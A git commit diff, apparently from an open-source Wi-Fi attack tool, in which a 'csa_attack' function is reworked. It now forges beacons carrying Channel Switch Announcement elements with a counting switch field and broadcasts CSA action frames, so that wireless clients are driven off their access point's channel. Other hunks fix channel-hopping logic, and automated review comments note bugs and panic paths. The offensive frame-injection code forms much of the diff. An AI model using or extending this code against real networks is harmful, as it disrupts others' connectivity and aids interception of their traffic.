Fix channel locking skipping first channel after hop; fixed CSA to ma…
…ke more sense on the wire.
Ragnt committed Aug 15, 2024
1 parent 437ee16 commit 4df32a0
Showing 3 changed files with 22 additions and 26 deletions.
36 changes: 16 additions & 20 deletions src/attack.rs
@@ -36,7 +36,7 @@ use crate::{
// //
//////////////////////////////////////////////////////////////

pub fn csa_attack(oxide: &mut OxideRuntime, mut beacon: Beacon) -> Result<(), String> {
pub fn csa_attack(oxide: &mut OxideRuntime, beacon: Beacon) -> Result<(), String> {
if oxide.config.disable_csa {
return Ok(());
}
@@ -74,48 +74,44 @@ pub fn csa_attack(oxide: &mut OxideRuntime, mut beacon: Beacon) -> Result<(), St

// If we are transmitting
if !oxide.config.notx {
let random_client = ap_data
.client_list
.get_random()
.map(|client| client.mac_address);

// Send a CSA action frame to a random client
if let Some(client) = random_client {
let frx = build_csa_action(&client, &ap_data.mac_address, new_channel);
// Send 5 beacons with decreasing counts
for count in (0..6).rev() {
let frx = build_csa_beacon(beacon.clone(), new_channel.into(), count);
let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
oxide.status_log.add_message(StatusMessage::new(
MessageType::Info,
format!(
"CSA Attack (Action): {} => {} ({}) Channel: {}",
"CSA Attack (Beacon): {} ({}) Channel: {} | Count: {}",
ap_mac,
client,
beacon
.station_info
.ssid
.clone()
.unwrap_or("Hidden".to_string()),
new_channel
new_channel,
count
),
));
}

// Send beacons too
for _ in 0..10 {
let frx = build_csa_beacon(beacon.clone(), new_channel.into());
let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
}
let client = MacAddress::broadcast();

ap_data.interactions += 1;
ap_data.auth_sequence.state = 1;
// Send a CSA action frame to broadcast
let frx = build_csa_action(&client, &ap_data.mac_address, new_channel);
let _ = write_packet(oxide.raw_sockets.tx_socket.as_raw_fd(), &frx);
oxide.status_log.add_message(StatusMessage::new(
MessageType::Info,
format!(
"CSA Attack (Beacon*10): {} ({}) Channel: {}",
"CSA Attack (Action): {} => {} ({}) Channel: {}",
ap_mac,
client,
beacon.station_info.ssid.unwrap_or("Hidden".to_string()),
new_channel
),
));

ap_data.interactions += 1;
ap_data.auth_sequence.state = 1;
}

Ok(())
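Review bot: The comment `// Send 5 beacons with decreasing counts` disagrees with the loop under it, since `(0..6).rev()` runs six times (count 5 down to 0) and adds six status messages; the comment should state what the loop does, e.g. `// Send 6 beacons, count 5 down to 0`. Every `write_packet` result in this block is still dropped with `let _ =`, so the status log and `ap_data.interactions += 1` record a transmission whether or not the write succeeded. The loop also evaluates `beacon.station_info.ssid.clone().unwrap_or("Hidden".to_string())` on each pass; `as_deref().unwrap_or("Hidden")` would avoid the per-iteration allocation. `csa_attack` starts above this hunk and its closing brace is not shown.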
8 changes: 4 additions & 4 deletions src/main.rs
@@ -2857,7 +2857,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
channels_binding
.clone_from(&oxide.if_hardware.hop_channels);
cycle_iter = channels_binding.iter().cycle();
first_channel = *cycle_iter.next().unwrap();
first_channel = *cycle_iter.clone().next().unwrap();
oxide.if_hardware.locked = !oxide.if_hardware.locked;
} else {
// Get target_chans
@@ -2873,7 +2873,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
channels_binding
.clone_from(&oxide.if_hardware.hop_channels);
cycle_iter = channels_binding.iter().cycle();
first_channel = *cycle_iter.next().unwrap();
first_channel = *cycle_iter.clone().next().unwrap();

oxide.status_log.add_message(StatusMessage::new(
MessageType::Info,
@@ -2901,7 +2901,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
channels_binding
.clone_from(&oxide.if_hardware.hop_channels);
cycle_iter = channels_binding.iter().cycle();
first_channel = *cycle_iter.next().unwrap();
first_channel = *cycle_iter.clone().next().unwrap();

oxide.status_log.add_message(StatusMessage::new(
MessageType::Info,
@@ -2929,7 +2929,7 @@ fn main() -> Result<(), Box<dyn std::error::Error>> {
channels_binding
.clone_from(&oxide.if_hardware.hop_channels);
cycle_iter = channels_binding.iter().cycle();
first_channel = *cycle_iter.next().unwrap();
first_channel = *cycle_iter.clone().next().unwrap();

oxide.status_log.add_message(StatusMessage::new(
MessageType::Info,
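Review bot: `first_channel = *cycle_iter.clone().next().unwrap();` panics when `hop_channels` is empty, because `cycle()` over an empty iterator returns `None`, and nothing in these hunks shows the list being checked first. Since `cycle_iter` has just been rebuilt from `channels_binding.iter().cycle()`, the first element can be read without cloning the iterator, assuming `channels_binding` is a `Vec` or slice: `first_channel = *channels_binding.first().expect("hop_channels must not be empty");`, or a `let Some(..) = .. else` that logs and keeps the previous channel. The same line appears in all four hunks of this file, so a small helper would keep them in step. All four sit inside `main`, which starts and ends outside the rendered hunks.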
4 changes: 2 additions & 2 deletions src/tx.rs
@@ -722,15 +722,15 @@ pub fn build_probe_response(
rth
}

pub fn build_csa_beacon(beacon: Beacon, new_channel: u32) -> Vec<u8> {
pub fn build_csa_beacon(beacon: Beacon, new_channel: u32, count: u8) -> Vec<u8> {
let mut rth: Vec<u8> = RTH_NO_ACK.to_vec();

let mut frx = beacon.clone();
frx.header.sequence_control.sequence_number =
beacon.header.sequence_control.sequence_number + 1;
frx.station_info
.data
.push((37u8, vec![0u8, new_channel.try_into().unwrap(), 3u8]));
.push((37u8, vec![0u8, new_channel.try_into().unwrap(), count]));

rth.extend(frx.encode());
rth
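Review bot: `new_channel.try_into().unwrap()` panics for any `new_channel` above 255, while the caller shown in src/attack.rs widens its value with `new_channel.into()` only for it to be narrowed again here; taking `new_channel: u8` (or returning a `Result`) would remove the panic path. The new `count` parameter and the `(37u8, vec![0u8, …, count])` tuple are undocumented; a `///` comment naming element ID 37 as the Channel Switch Announcement element and its three bytes as switch mode, new channel number and switch count would make the signature change readable. `beacon` is already owned by the function, so `let mut frx = beacon.clone();` copies it a second time after the caller's own `beacon.clone()`. The function's closing brace is outside the rendered hunk.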
